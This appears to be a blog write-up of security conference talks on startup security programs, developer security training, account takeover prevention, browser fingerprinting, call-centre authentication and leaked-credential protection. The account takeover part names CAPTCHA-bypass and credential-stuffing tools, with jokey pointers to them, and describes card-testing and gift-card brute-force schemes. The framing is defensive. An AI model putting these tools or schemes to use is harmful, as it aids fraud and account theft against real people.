It’s not uncommon for companies to have an incident or two and/or get to a certain size where they realize they need someone to work on security full time. You might want to ask during the interview, or at least when you show up on the first day, what prompted investing in security now?

Remember:

  • You were hired because you are the expert: people will listen to you.
  • You can do whatever you would like: whether it’s good for security or not.
  • You’ll have little internal guidance.

What Should Inform Your Priorities

All of the following influence what you prioritize first:

B2B vs B2C
This is the biggest thing that will inform your priorities. Who are your customers and what do they want from your company / the security team?

If you’re a B2B SaaS business, you’ll need compliance certifications in order for your sales team to continue selling the product to bigger and bigger customers.

Company Size
If you’re the first security person joining a 500 person team vs a 100 person team, you’ll likely prioritize different things. If the team is already large, you may want to focus on hiring other members on your team to scale your efforts.

Customer Base
Who your customers are within B2B or B2C also influences things, for example, selling HR software to banks vs. marketing software for solo consultants.

Product
There are different expectations of the security bar of your company based on what your product is.

Engineering Velocity
If your company has a move fast and break things mentality then the security team needs a different approach than if the culture is a low and slow type of company.

Company culture
Some cultures are really open to security people joining, other don’t understand why security is important. Every company is different.

In summary, companies care more or less about different things and will have different areas of risk.

Startup Security Playbook

Evan breaks where you should focus your efforts into 4 core areas:

Startup Security: Playbook

The common denominator of all of these is that they’re short in scope. You can get 95% of the way to at least initially addressing all of these in a quarter.

Security Engineering

This includes product / application security, infrastructure security, and cloud security.

SDLC and Security Design Reviews with engineers
Starting to work with engineers and embedding yourself in how they work pays major dividends later. If there isn’t a current SDLC structure, you can do inbound only. Offer to do code review and threat modeling, show value, and word will spread. Your ad-hoc process won’t have full coverage, but it’s a good start.

Understanding your tech stack by engineering

If you want to make a difference at a startup with the way people are building software, you need to build software.

If you want to learn about how your tech stack works at a deep level, you need to build software.

A great way to build relationships with engineers is to work with them and have them see you build things as well.

How your manage secrets, keys, and customer secrets
Take inventory of all of your really critical assets.

  • Secrets - Do you have a management system for secrets? Are people happy with it? Do you need to roll out Vault or some other secrets management system?
  • API Keys - How are they used in prod? How are they shared between developers? What API keys do devs have access to? Do you have engineers with prod cloud platform API keys on their laptops?

You can have a big impact in a short amount of time here.

Bug Bounty
Don’t rush into having a bug bounty, wait until you have the bandwidth to quickly and efficiently address submissions and resolve reported issues.

You need to make sure that you have a goal of what types of issues you want out of your bug bounty, and your bug bounty is set up to get that output. Otherwise, you will just waste cycles.

Detection & Response / Incident Response

Detection and Response is one of the hardest areas to get traction. It’s also something that spans a ton of different domains: production, corporate, incidents, applications, infrastructures, SaaS…

Basic Incident Response Plan
Have a plan, get people to understand that plan, and make sure you are looped in when things go awry.

Set up a commmunication channel- people will start reporting things immediately, especially if you don’t already have some logging and monitoring set up. Create a way for people to tell you when things are on fire.

What are your top security signals for the organization?
What really matters for security, and how do you get insights in to them?

Consider starting with monitoring AWS key usage, access to applications in your identity provider, and DNS at corporate offices.

Establish a communication channel with rest of company
How do people talk with you? How do people get ahold of you when they need you? This can be as simple as an email alias.

Logging Strategy
Where are you going to store logs over the long term?

Compliance

Public facing security docs are great
Something you can put on your website with technical details about the security things you’ve done that people can reference. Have a security page and a security@ alias for people to report bugs.

Knowledge Base
The best use of your time is not completing questionaires for sales teams. Find a way to make it self-service.

Understand existing commitments
Before security people join a startup it’s common for the business to make commitments to future compliance standards that they might not be ready for, but might not have any idea how hard it will be. Sometimes that’s why you were hired in the first place.

Ask management what compliance commitments your company has made.

GDPR and current laws
Make sure you comply with all of the relevant laws.

Corporate Security

Identity and Access Management
You need a way to manage your applications and access to them. Corp and prod are both important, but corp may be easier to address first.

Endpoint Security
Tablestakes for the long term. It’s better to get this done sooner rather than later, because it’s easier the smaller your company is.

On-boarding and Off-boarding
You can bake a lot of security (and hopefully usability) into these. They’re also tightly coupled with Identity and Access Management: do you remove people from prod when they no longer need access?

Workplace security
How do you protect people in your space? How do people badge in? Do they have to wear badges? Do you have doors propped open? Many startups start in small lofts and when they get a bigger space, they’re not used to hanndling these types of issues. Have procedures and policies for the ways visitors visit.

Personal Stories

segmentio/aws-okta - success

At Segment, they deleted every engineer’s AWS key that they used on a day-to-day basis and gave them an equivalent role that they could access through Okta. This aws-okta tool is a drop-in replacement for aws-vault, which engineers were previously using.

Why was this such a success:

  • It raised Segment’s security posture massively.
  • The dev UX was really fast and smooth.
  • It was a massive change that engineering went to 100% adoption in 2-3 weeks of the security team working on it.

segmentio/chamber - failure

As the security team, it’s easy to say that you’ll handle all of the secrets for devs. But, Evan quickly found that people assumed he’d also handle rotation, ownership, managing the secrets, etc.

This project dragged on until he cut the scope and reset the expectations of engineering.

Key Takeaways

The two most important takeaways are:

  • Focus on things you can complete.
  • Focus on the biggest problems.

Otherwise you’ll never finish anything. Knock out the big things that you can finish.

Avoid taking on things that require lots of upkeep when you are a small team

  • Bug bounty takes a lot of upkeep. Buy the triaging from the program you’re using.
  • Avoid overcommitting to design reviews, arch reviews, etc. If you spend all your time doing those you will never be able to focus on making security better over the long run.

How are you more secure this month compared to last month?
Everyone should be asking this every month. What is built now that wasn’t there a month ago?

Startups are not for everyone
If you don’t have executive support, you should find a new company.

Security company? You better dogfood
If it’s good enough for your customers, it should be good enough for you.

Remember to keep it simple. Don’t focus on fancy solutions. Focus on the basics.

Focus on things that actually have a meaningful and measurable impact, instead of just fun projects you want to work on.

Questions

Do you have any strategies for helping future-proof your company’s security as it grows rapidly?

This is really hard and there’s no magic solution. Being able to brutally prioritize is key: determining which fires you can let continue to burn while you work on more pressing matters.

When you come into a company that already has all of this infrastructure in production and assets, how do you take inventory of what you already have (code) as well as your Internet-facing attack surface?

Evan’s generally accomplished this by working really closely with people who know these things; there are always a few people who know where all the bodies are buried, and they’ll tell you. They’ll be able to tell you valuable things like, “I did X for this security reason,” which will help you figure out where things are at and pick it up from there.

It’s essential to build trust with these people so you can keep asking them these questions. Learn who to ask.

Working with Developers for Fun and Progress

Leif Dreizler, Senior AppSec Engineer, Segment
abstract slides video

Influential Resources

Leif listed several talks that were influential to him and Segment in building a security program:

Leif also recommends the book Agile Application Security: Enabling Security in a Continuous Delivery Pipeline by Laura Bell et al.

Favorite Quotes

“Effective Security teams should measure themselves by what they enable, not by what they block” - Rich Smith

Enable, Don’t Block Ideally the security team should say no as infrequently as possible. When you have to, say “No, but…” and help your colleagues find a way to accomplish their jobs.

“Vulnerabilities are bugs. The more bugs in your code, the more vulnerabilities”

Security Has to Start with Quality Devs fix bugs all the time. Vulnerabilities are just bugs that have a security impact. They should be priotized and fixed like the rest.

“Learn to lean on your tools. But depend on your people to keep you out of trouble.”

Choose People over Tools People making good decisions earlier in the process are going to provide more value. You won’t have to find certain classes of vulnerabilities if you make good framework decisions.

“Make it easy for engineers to write secure code and you’ll get secure code.”

Check out Morgan Roman’s DevSecCon Seattle 2019 talk Ban Footguns: How to standardize how devs use dangerous aspects of your framework for one of my favorite talks in this area.

Organizational Buy In

You need the whole company needs to care about security - you can’t just buy a security team and security products. It helps to have a passionate security executive who can translate what the security team is working on to executives.

Security headcount, including people with a range of skillsets, as well as engineering time, to fix bugs as as build scalable systems are also important.

Jonathan Marcil’s Threat Modeling Toolkit informs how they do threat modeling.

If you don’t have security buy-in from the top down I would probably look for another job because it’s definitely an employee’s market right now.

Building a Team

They’ve had success building security teams by hosting security meet-ups, speaking and attending conferences, sponsoring meet-ups, volunteering for OWASP, etc.

Getting involved in OSS software is also great.

Check out David Scrobonia’s talk (Leif’s colleague): Usable Security Tooling, in which he describes the heads-up display he built for ZAP.

Segment’s Head of Security, Coleen Coolidge, also gave a related talk: How to Build a Security Team and Program.

Training

All devs who join Segment go through two security trainings.

Part 1: Think Like an Attacker - Creating Relevant Content

Segment’s security training is interesting for developers because the security team makes it as relevant as possible.

The bug examples devs see in the training are sourced from real Segment bugs, found via bug bounty submissions, pen tests, or internal testing. This makes the vulnerabilities seem real, rather than abstract generic examples.

They also introduce Bugcrowd’s Vulnerability Rating Taxonomy (VRT) to show devs how the security team thinks about the relative severity and priority of vulnerabilities. This gives devs an anchoring in the future for how quickly they need to fix certain bug classes.

OWASP Juice Shop is used as the vulnerable app as it uses a similar tech stack to what Segment has internally.

Hands-On Training Schedule

The security team talks about a few vulnerability classes (slides + examples), then everyone does some interactive training (Burp Suite + Juice Shop). Repeat for other bug classes.

As the training is progressing, the names of devs are being written on a whiteboard as they successfully find and exploit bugs. It’s a leaderboard in which they’re competing against their fellow incoming dev cohort. This really helps with engagement, both by making it fun as well as making people not want to be the only people not on the board.

Working with Devs: 1337erboard
The Segment security team manages a 1337erboard that tracks people’s security ‘score’. Points are given for attending and participating in security training, finding bugs, fixing bugs, posting an interesting article in the #security Slack channel, etc.

By both presenting information as well as having devs actively engage with hands-on exercises, devs are more likely to absorb and retain the info.

I hear and I forget. I see and I remember. I do and I understand -Confucius

Part 2: Secure Code Review

Segment bases their secure code review training on the OWASP Secure Coding Cheat Sheet, tailored to Segment’s environment.

The main topics they cover include: XSS, broken access control, secrets management, error handling, SSRF + DNS rebinding, and more.

Leif and his colleague David discussed SSRF and DNS rebinding on the Absolute AppSec podcast #42, including a useful open source security tool Segment released: netsec, a proxy to block SSRF attacks targeting internal IPs.

Working with Devs: Coding Guidelines
One of the Segment devs created a web app where you can enter a few keywords and it’ll bring up information from the relevant secure coding guideline

Benefits of AppSec Training

  • The security team gets to meet new engineers early in their time at Segment and start building a positive relationship
  • Devs are introduced to common vuln types
  • “Security Judgment” - give devs a feel for when they should ask for help or do more research when building a feature
  • Teach devs to apply a security mindset when reviewing PRs
  • Have fun during onboarding!
Working with Devs: Hackerman
Devs get "I Hacked" and "Hackerman" stickers after they complete the training

Vendor Adoption

How do you buy security tooling for devs and have them actually use it?

The Segment security team doesn’t actually buy many tools for their own uses, it’s more often for devs. The security team partners with engineering during the evaluation process to make sure the tooling is easy to use and meets devs’ needs.

Example - Snyk

Leif walks through how Segment adopted Snyk, a tool to help companies manage vulnerabilities in their dependencies. The process had the following steps:

Security Evaluation
First, the security team tested Snyk on various repos, ensuring it had the required features (e.g. language support).

Partner with Engineering
They partnered early in the process with engineering, as devs are the ones who are going to have to use the tool, not security. They did not buy it without seeing if the tool would work for devs.

Presented at Engineering All-Hands
They made it fun by having people write down on a piece of paper how many total dependencies they thought Segment had across all projects and had a Price is Right-style competition in which the winner got a crown.

Initial Roll-out by Security
The security team submitted PRs integrating Snyk to Segment’s core repos. Devs could then add Snyk to other repos based on these examples.

The security team also added Snyk to the Segment starter templates for new Go repos, so any new Go repos created using the standard development process will use Snyk without the dev having to do anything.

Hitch Security to the Developer Productivity Bandwagon
Integrating security controls and tooling into standard dev tooling is one of the most effective ways to get broad adoption of the things you build as a security team. I’ve seen this time and time again and various companies. This also forces you to keep dev UX in mind, as you probably won’t be allowed to introduce a tool or process with too much friction into standard dev workflows.

See Lessons Learned from the DevSecOps Trenches and Netflix’s Layered Approach to Reducing Risk of Credential Compromise for more examples and thoughts on this.

Working with Devs: Directory
The security team also wrote Snyk integration with Directory, an internal Segment uses to display various useful meta info about services

Some people on Twitter talk about the “security basics,” and I don’t think that’s a good name for it because “security basics” are actually really hard.

“Fundamentals” is a better name. Shooting in basketball is a “fundamental,” yet it takes years and years to get as good as Steph Curry.

Bug Bounty

Pay for anything that gives value. If there’s a duplicate that still gives you value, pay that person for it.

There’s a lot of work that goes into assessing a new target, reading the program scope, understanding the product, etc. If you can build a relationship with security researchers who are going to provide you value in the future, a few hundreds dollars is a small cost to your org.

We’ve gotten all of our most critical findings from researchers we previously paid for dupes or something early.

If you’re thinking about money on a per bug basis, you’re probably thinking about bug bounty in the wrong way.

What other tool do you judge based on how much each individual instance provides value? You should be thinking about the bug bounty program as a whole based on how much you’re spending vs other security tools.

Bug Report → Jira

You want to make bugs easy for devs to fix, so you need a good description, easy to follow reproduction steps, severity, remediation criteria, and a suggested remediation.

If your write-up doesn’t describe the impact in terms devs can understand without help, they’re probably not going to resolve it with the same urgency as you would.

Security ➡ Engineering Embed Program

Segment has found a lot of value in embedding security engineers in engineering teams for a quarter or so. These security engineers follow all the normal software design processes that devs do: writing software design docs, getting buy-in for the feature, working with the design time, writing good test cases, and following deployment procedures.

Ideally the security engineer sits with the dev team, goes through their onboarding process, and basically just part of their team.

The process is a great way to build empathy for devs. Maybe you’ll find the security review process sucks and you can make it more usable.

Benefits By walking a mile in a developer’s shoes, you will:

  • Make valuable connections- you’ll meet devs, designers, product managers, and other people you wouldn’t normally meet.
  • Develop a deeper understanding of the engineering process, including their tooling and constraints.
  • Build rapport with engineering, as you demonstrate that you can build useful features and tools.
  • Learn more about the code base you’re protecting.

You can then bring these insights and lessons learned back to the security team, helping the team be more effective over time.

Developer Friendly SAST

Leif recommends checking out the LASCON talk by the Datadog security team Orchestrating Security Tools with AWS Step Functions, the Absolute AppSec podcast #33 with John Melton on linting and other lightweight security checks, and Coinbase’s Salus tool.

Check out my 2019 ShellCon talk Rolling Your Own: How to Write Custom, Lightweight Static Analysis Tools for how to use open source tools to create custom checks for interesting code patterns, for example, to detect bugs or anti-patterns.

In Case of Emergency

Ideally you never have to use these, but if you really need to get something fixed:

  • Compliance requirements (GDPR, ISO27001, etc.)
  • Recent pen tests (shown to customers)
  • Customer security questionnaires
  • “My peers at companies x, y, an z do thing



Account Security

Automated Account Takeover: The Rise of Single Request Attacks

Kevin Gosschalk, Founder and CEO, Arkose Labs
abstract slides video

In this talk, Kevin defines “single request attacks,” describes challenges of preventing account takeovers, gives examples of the types of systems bots attack in the wild and how, and recommendations for preventing account takeovers.

Kevin spends the first 6 minutes of this 49 minute talk (~12%) discussing his past work on eye imaging software to detect diabetes earlier and working with Microsoft on Kinect motion sensor-type technology. He starts talking about Account takeovers at 6:16.

Kevin defines account takeover (ATO) to be “using another person’s account information to obtain products and services using that person’s existing accounts.”

Attackers can use compromised accounts to do things like redirect packages (if they’ve compromised a UPS or Fedex account) which they can then sell, scrape private or sensitive content that the victim account has access to, or most commonly, make transactions for their financial benefit.

As the security of most IoT devices is poor (being generous), attackers have been hacking IoT with blatant security flaws or just default passwords, and then routing their brute force login attempts through the devices so the guesses come from a wide range of IPs.

Challenges to Preventing Account Takeovers

  • Attackers can use a unique IP for every request, making IP-only solutons ineffective.
  • Attackers use a unique identity (e.g. user agent, installed fonts, other fingerprintable aspects) for every request
  • Browsers are easy to automate (e.g. headless Chrome, Selenium, PhantomJS), making it hard to differentiate bot clients from real users.
  • reCAPTCHA is easy to bypass using modern machine learning techniques. Check out the Russian software XEvil Solver if you need to bypass reCAPTCHA at scale.

There are a number of tools, such as AntiPublic, which for an affordable price, will automate much of the account takeover process for you. You provide a set of email addresses, passwords, and websites you’d like to target, and it’ll give you helpful stats like success rates, which accounts worked, etc. Some of the tools even include a free trial! Such customer service 👍

Bot Attacks in the Wild

Airlines: One airline had all of its seats “sold out” for two weeks into the future, so potential customers couldn’t buy them. Bots would select a seat and continue to payment, where the site redirects to a third-party, such as Alipay or PayPal. However, the bot doesn’t complete the transaction, it just holds the reservation, preventing anyone else from buying it until the transaction times out. Rinse and repeat.

Concerts: Most concert tickets are sold out in 3 minutes now because of bots. The scalpers then resell the tickets for a hefty profit.

Gift cards: When you buy a gift card, they scan it at the cash register, which then “activates” it. Bots can brute force the gift card’s unique number so an attacker can spend the value once the card is activated but before its used. Merry Christmas.

Credit cards: When hackers obtain stolen credit cards that they aren’t sure are working, sometimes they’ll test them by making $1 donations to various charities and see if it succeeds. Bonus: these charity sites tend to have few to no protections against bots and they sometimes give helpful feedback, like “Sorry, that’s the wrong CVV / address,” making determing the correct values much easier.

Clothes: Bots snatch up shoes and other apparel that are released in limited quantities and resell for a nice profit.

Pokemon Go: Hackers used a modified Android OS to bypass SafetyNet, which is an Android API developers can use to “assess the device’s integrity.” (good ‘ol return true).

Dead voters: The Death Master File was leaked at one point, which is a government file that lists who has died, their date of birth, SSN, and last zip code where the person was alive. Hackers have used the list to create accounts on various sites where “real people” are needed, like voting in certain polls, for example, commenting against net neutrality.

Auction abuse: Rivals bid up competitors’ products and then bail out of paying at the last minute, so their items are purchased instead.

How do we stop account takeovers?

In the last four minutes, Kevin shares a few thoughts on stopping account takeovers.

  1. Rate limit by email and identity - give users 3 attempts via an IP or identity
  2. Lock accounts with suspicious accounts
    • Email the account owner when an incorret password is entered or multiple attempts have been made. Note that this can be a bad user experience, leading you to lose customers.
  3. Use MFA
  4. Require (and enforce) strict passwords, and test them against the HaveIBeenPwned API.

How do we make it more expensive for the attackers than the value they’d get out of committing fraud? If we can break the economics of it, they’ll attack someone else.

Browser fingerprints for a more secure web

Julien Sobrier, Lead Security Product Owner, Salesforce
Ping Yan, Research Scientist, Salesforce
abstract slides video

This talk describes how Salesforce uses browser fingerprinting to protect users from having their accounts compromised. Their goal is to detect sessions being stolen, including by malware running on the same device as the victim (and thus has the same IP address).

They’re interested in detecting two types of cases:

  1. Per user - significant changes in the fingerprint of one user (targeted attack)
  2. Across users - many users now have the same fingerprint (e.g. many users infected by the same malware)

They use 19 fingerprint vectors, which are largely standard features used by prior work like Panopticlick and Browser Leaks:

  • User agent
  • Screen resolution and window size (height and width)
  • Pixel density, color depth
  • Time zone and language
  • Plugins and fonts installed
  • navigator.platform
  • canvas and media devices
  • If session storage, local storage, web sockets, and indexDB are supported
  • Codecs and DRM, if DNT is enabled

They needed to determine how much and often a user fingerprints changed, as if fingerprints were highly variable, their system may report many false positives, leading to bad user experience. If fingerprints tend not be very unique, then they may not be effective at detecting compromised user sessions.

Browser Fingerprint Uniqueness
Consistencies across sessions for a given user is pretty high (77% no change), and 78% of fingerprints are unique to one user. Thus, this approach is promising.

To measure how much a user’s fingerprint changes over time, they use Shannon entropy. A high entropy value indicates that the user’s fingerprint can be quite variable, while low entropy means it stays consistent.

Browser Fingerprinting Methodology
This the approach from end to end - fingerprint data is collected client side from user browsers via JavaScript and sent to Salesforce servers. After a training period (say 2 weeks), each user is giving an entropy score based on how much their fingerprint changes over time. Then when a user is observed with a new fingerprint, they do ‘fingerprint diffing’, which weights how likely the user’s session is to change as well as the magnitude of the change. For example, having a totally different IP address vs a different one on the same subnet.

Out of the hundreds of millions of user sessions Salesforce sees per day, the system flags around 20-30 suspicious ones that are passed on to the SOC team to investigate. Of these, roughly half are truly compromised accounts.

One thing the system doesn’t yet effectively handle is users who consistently use more than one device, but that may be addressed in future work.

Contact Center Authentication

Kelley Robinson, Dev Advocate, Account Security, Twilio
abstract slides video

Kelley describes her experiences calling in to 30 different company’s call centers: what info they requested to authenticate her, what they did well, what they did poorly, and recommendations for designing more secure call center authentication protocols.

Research parameters

Kelley chose companies for which she had an existing account with at least some personal info tied to it (e.g. orders, her address) that had an available USA customer support phone number that accepted inbound calls.

She mostly tested information gathering (read), but did some limited actions and account changes (write). In several cases, attempting to change attributes of an account triggered additional security checks.

Kelley ended up contacting 30 companies, including United, Netflix, Apple, Hyatt, conEdison, Lemonade, Walmart, Chase, Mattress Firm, and Comcast.

Background

Getting in touch with companies over the phone can generally be grouped into the following categories:

  1. They provide a customer support number (e.g. Home Depot, Comcast, State Farm)
  2. They have a “Call me” feature (e.g. Walmart, Amazon, Verizon)
  3. No phone number provided (e.g. Facebook, Lyft)

Kelley focused on the first category in this research.

While most companies provided an Interactive Voice Response (IVR) system that lets you specify what you’re aiming to do via voice and/or keypad presses, the path you select rarely matters if you end up talking to a human agent.

Companies tend to do identification in one of the following ways:

  1. Automated with the phone number you’re calling from (caller ID), if your account is tied to your phone number.
  2. Automated with info a company-specific number you provide, like an account number, insurance ID, credit card number, etc.
  3. Manual with an agent, which is what this talk focuses on.

Identifying you is not the same as authenticating you!

Establishing identity can be done with personal information, such as your date of birth, but this information tends to be static and searchable online. Many people could find out this information.

Authenticating is proving you that you are actually the person you claim to be, usually via a secret, such as a one time code sent to your phone.

Results

At a high level, some companies did very well, others don’t vet you very strictly, for example, they just ask for your name and date of birth, which can be easily found.

Contact Center Authentication - Results Chart
The identification methods used by the companies Kelley contacted. Note that the most popular types on the left are more related to ‘identify’ than ‘authentication’, in that they’re static and/or and semi-public. Overall, not the type and rigor of attributes we’d like to see from companies.

Kelley noted that one shipping company asked for her password, so they could log in as her in their system 😅.

Kelley had just moved when she was doing this research, so sometimes she’d ask services for the address on her account to ensure it had been updated. Some wouldn’t provide this info, but some would. This is a problem because some services use your address to identify you, so when a company gives this info out they’re making your other accounts more vulnerable to account takeovers, and potentially putting you at personal risk.

Moar stats plz
I liked the content, structure, and the fun presentation style of this talk. If I could provide one piece of feedback, it would be that I would loved to see more stats on what Kelley observed across all of these companies.

Here we see the types of identity info companies asked for, but what were the identity info combination companies tended to ask for? How many companies asked for one vs more than one form of ID? How many companies leaked aspects of your account info, and what info? How many companies allowed state changing account actions with what level of identity/authentication? How many companies required additional info for state changing actions, and what info did they ask for? Did any of these vary by company vertical, and what were the trends?

The Good: Actually Authenticating Users

Some services did really well, providing users one time codes for authentication and refused to disclose personal information.

Contact Center Authentication - Netflix
Once you’re logged in, Netflix has this Service Code button that provides you a 6 digit code that you can then provide to a service rep to authenticate you.
Contact Center Authentication - Stripe
Stripe provides an easy built-in way to authenticate yourself to Stripe, and vice versa. I think this is awesome, and not something I see commonly from companies.

The OK

Most companes were here - room for improvement but overall positive, doing things like:

  • Recognizing the phone number you’re calling from.
  • Verifying multiple forms of personal information.
    • If you’re not going to true authentication, at least require the caller to have multiple forms of information.
  • Prompting with relevant account actions.

For example, the automated intro when calling in to United:

Welcome back, Kelley. I see you’re flying from LA to Newark Liberty today, are you calling about that trip?

Of course, there’s some risk here about revealing info about her travel plans, but that is ephemeral. There were some utility providers that when she’d call would prompt with, “Hi Kelley, are you calling about your account at 123 Main Street Apartment 3?”

Recommendation: Prompt users with relevant account actions they can take, but try to not to give away too much info about them.

The Bad

The process followed by these companies would allow successful phishing with minimal effort:

  • Only asking for one form of identity, for example, looking up your account by phone or email and asking no additional questions.
  • Identifying callers via easily accessible public information (e.g. phone number, email address, date of birth).
  • Requiring a Social Security Number.
    • This is not an authenticator! Many companies treat this as a secret but it’s not. SSNs have been leaked in many breaches, and they were issued serially prior to June 25, 2011.

The… oh… oh no

  • Giving out identity information. This was more common than she would like.
  • Allowing account changes without authentication.
  • Asking what phone number or email address to send an authentication token to 😆.

Recommendations

Alright, so what can we do to build more secure contact center authentication protocols?

Unify Authentication Systems

Use the same rigor for authentication over the phone as you do on your website, and honor user settings for things like 2FA.

Build Guardrails for Agents

Agents want to be helpful, and most don’t have anti-phishing training. We can design the systems and processes they use such that they can’t accidentally give out too much information about a users’s account.

  • Limit caller information available to agents.
    • If a user isn’t asking about address info, then don’t show it to the agent.
  • Only expose information after a caller is authenticated.
    • Thus a user’s info can’t be leaked until we’ve proven it’s them.
  • Have a small subset of agents that have access to do the most sensitive actions, who have undergone social engineering training, who are passed along the potentially dangerous calls.
  • Do a risk assessment using provided identity.
    • You can do things behind the scenes to detect fraud that’s transparent to the user. For example, there are services that can provide reputation/fraud info related to specific phone numbers or email addresses.
Contact Center Authentication - Guardrails
Provide guardrails for agents so that they can’t accidentally share info they shouldn’t.

Of course, there are trade-offs in building these guardrails - it can be a worse user experience, and it can make customer service calls longer, which increases cost.

Consider Your Threat Model

Reflect on what are you allowing people to do over the phone. If you can’t implement true authentication, limit the sensitive actions that can be taken, and instead direct users to your website.

Leveraging Users’ Engagement to Improve Account Security

Amine Kamel, Head of Security, Pinterest
abstract video

Amine describes how Pinterest protects users who have had their credentials leaked in third-party breaches using a combination of programmatic and user-driven actions. He refers to these users as “high risk users” (HRU).

Balancing Security and User Experience
One thing I liked about this talk is how Amine described the various protection mechanisms they could implement and how Pinterest weighed the security ROI vs the impact on user experience.

It’s easy, as a security professional, to say, “Let’s do this, because it has the best security properties,” when in the real world, we need to be balancing security with the needs of our business and the experience of our users. A perfectly secure business with no users won’t be a business much longer.

Leveraging User Engagement: Approach Architecture
Pinterest’s solution has the following 4 steps:
  1. Record Ingestion: Ingest third-party data breach info
  2. Account Matching: Determine email/password combinations that match Pinterest users
  3. Account Tagging: Tag accounts as high risk once credentials have been verified to be in use
  4. Account Protection: Protect accounts to prevent account takeovers

1. Records Ingestion

There are a number of sources you can use:

  • Vendors: Reliable, provide info in an organized, easily parseable format, but can be pricey. (e.g. HoldSecurity, Qintel, Shape)
  • Public Dumps: Tend to be unreliable, disorganized, and have duplicates. Thus, they require more work to get value from, as you need to verify and clean up the data. (e.g. pastebin.com)
  • Threat Intel Platforms: These tend to be more for malware analysis, spam, etc., but can be useful here. (e.g. Threat Exchange, AlienVault OTX)
  • Random Sources: Other publicly available, reporters, underground forums, dark web services and markets.

2. Account Matching

  1. Dump your whole list of users
    • Somewhere safe, like in a strictly secured S3 bucket that can only be accessed by your matching service.
    • You can do this at whatever frequency makes sense for your business, for example daily or weekly. Pinterest does it every 3 days.
    • Structure the user data like: user_id | email | bcrypted_password
  2. Combine accounts
    • Filter through the data you’ve ingested and look for emails that also belong to users within your system.
    • For each matched email address, recompute the bcrypt‘d password and determine if it matches the value from your database. If so, add it to the list of “matched” accounts.
  3. Upload accounts - upload only the list of user_ids matched to an S3 bucket, delete the prior user account list dump.

3. Account Tagging

This process can be challenging, as there are many large files to process and potentially many users per file to tag as being at high risk for account takeovers.

Pinterest’s solution is to have a nightly tagging job that distributes the work over multiple worker threads.

Interesting points:

  • High risk users are given a Unix timestamp field credentials_leaked_at, not just a boolean like has_leaked_creds, because timing matters.
  • They define a is_high_risk_user function, that incorporates if the user has changed their password after when their creds have leaked and if they’ve turned on 2FA.

4. Account Protections

Pinterest uses two classes of account protections: programmatic, enforced automatically by Pinterest, and user engagement-based, which requires active steps taken by users.

Programmatic Protections

Again, the goal is to protect as many high risk users as possible while minimizing friction and providing a great user experience. This comes into play below when determining when and how to protect users.

To protect users they:

  • Immediately invalidate all active sessions (Have a session_valid_after field so that sessions that predate your protection are no longer valid)
  • Link users to the reset password / recover account flow.
  • Send the user an email letting them know what happened. They noticed that this is a good opportunity to encourage users to enable 2FA, as users who received this email tend to be more likely to do so.
Leveraging User Engagement: Reset Email

When should you protect users?

  • As soon as possible
  • Next time they log in (don’t affect active sessions)

Pinterest choses the latter, protecting on next login, the intuition being that if an attacker gained access to a user’s credentials, they’d use them to log in, and thus create a new session. They don’t want to affect active sessions unless they have evidence that that account has been exploited.

Within protecting users as they log in, there are two options:

  • Aggressive approach: each time a high risk user is logging in, protect the account (impact growth)
  • Balanced approach: correlate with other signals to determine risk. Have we seen this device/browser before? What’s the reputation of the IP?

User Engagement-based Protections

Encourage the user to help secure their account, as we’re not sure if they’ve been exploited.

A benefit of this approach is that you don’t have to invalidate their session and log them out, which is a better overall user experience.

How to do this?

Leveraging User Engagement: Security Nags
Give users several options to go from an insecure state to a secure state.

As the user is setting a new password, you can enforce that they create a more secure password, in length and complexity as well as ensuring it doesn’t match known breached passwords.

A user can also chose to link their account to Facebook or Google instead. In that case, Pinterest disables password-based logins for that user.

Not Just High Risk Users
You can use this same security nag approach on other high value accounts, such as advertisers, businesses, celebrities, and creators.

Results

On average, they programmmatically protect ~5,500 high risk users per day, or ~170,000 per month.

High risk users choose to secure their accounts by (daily average):

  • Changing their password: ~1,200 users
  • Using Google for login: ~1,000 users
  • Using Facebook for login: ~900 users

Pinterest has observed a 20% engagement rate with the security nag. That is, 1 out of 5 users who see it will go through the full flow of securing their account.

Nice! That’s much higher than I expected.

On average, user engagements adds ~3,100 high risk user protections per day, or 96,000 per month.

Together, programmatic and engagement-based protect ~266,000 high risk users per month.



Blue Team

CISO Panel: Baking Security Into the SDLC

Richard Greenberg, Global Board of Directors, OWASP
Coleen Coolidge, Head of Security, Segment
Martin Mazor, Senior VP and CISO, Entertainment Partners
Bruce Phillips, SVP & CISO, Williston Financial
Shyama Rose, Chief Information Security Officer, Avant
abstract video

What were some of the biggest challenges you’ve encountered in baking security into the SDLC? Any tips?

Shyama
Works in the financial industry. The biggests challenges for her are the supplier due diligence and collusion problems. She’s received warnings from DHS before about supply chain security.

Bruce
Works at an insurance company. There’s always a tradeoff between security and usability. Businesses generally care about revenue and usability.

Martin
Thinks about the culture aspect. You can’t just have security people telling devs their baby is ugly. “DevOps is ultimately a cultural discussion, not a technical discussion.” This is ultimately a people problem.

Colleen
Works at Segment, a rapidly growing startup. When you join a startup, you never know how someone is going to receive security. You could have had the best AppSec in the world at your previous place, but when you go to a new company, it’s completely different. They don’t know who you are, they may not trust you, but they suspect that you’re there to slow them down. So figuring out what the dev workflow looks, and being able to embed what you want to accomplish into their workflow so devs don’t feel like you’re telling them “no” or giving them a bunch of work. You want thtem to feel like you’re weaving it into their day to day that’s already happening.

They’ve found a lot of success with embedded security engineers in dev teams and having them build something with the devs. This shows you what devs struggle with on a day to day basis, what they have to deal with, and enables you to bring back these insights to the security team. You’ll model secure development for them that they can copy once you’ll leave, and you’ll meet devs who are passionate about security who you can later mentor and encourage them to be security champions.

The closer you can bring in the rest of engineering the better. The security team should not be seen as separate, you should be seen as a partner and a critical part of how engineering build things.

Check out Leif Dreizler’s talk Working with Developers for Fun and Progress for more details on how Segment embeds security engineers in dev teams, as well as how they do training, vendor adoption, and more.

Richard
Meets upfront with engineering leads on teams and takes them to lunch. First impressions are crucial. They’ll remember 3 years later that you took them to lunch. You have to establish a dialogue with people you’re going to be working quite closely with.

How does DevOps change things and how do you adopt DevSecOps?

Bruce
Views DevSecOps as “the perfect world where the security team and the operations team and the development team all get together to build applications that meet business needs and protect consumers and shareholders.”

To him, the #1 challenge with DevSecOps is that it doesn’t include the business. His primary challenge is getting the business to understand the complexity of building the apps they try to run things on.

He believes it should instead be called something like “DevSecBizOps,” because we need to add the business side into things.

Martin
DevOps’ value is velocity, taking the standard change and build processes and enabling devs to ship code quickly. We can also talk about DevSecOps as quality, not just security.

Colleen
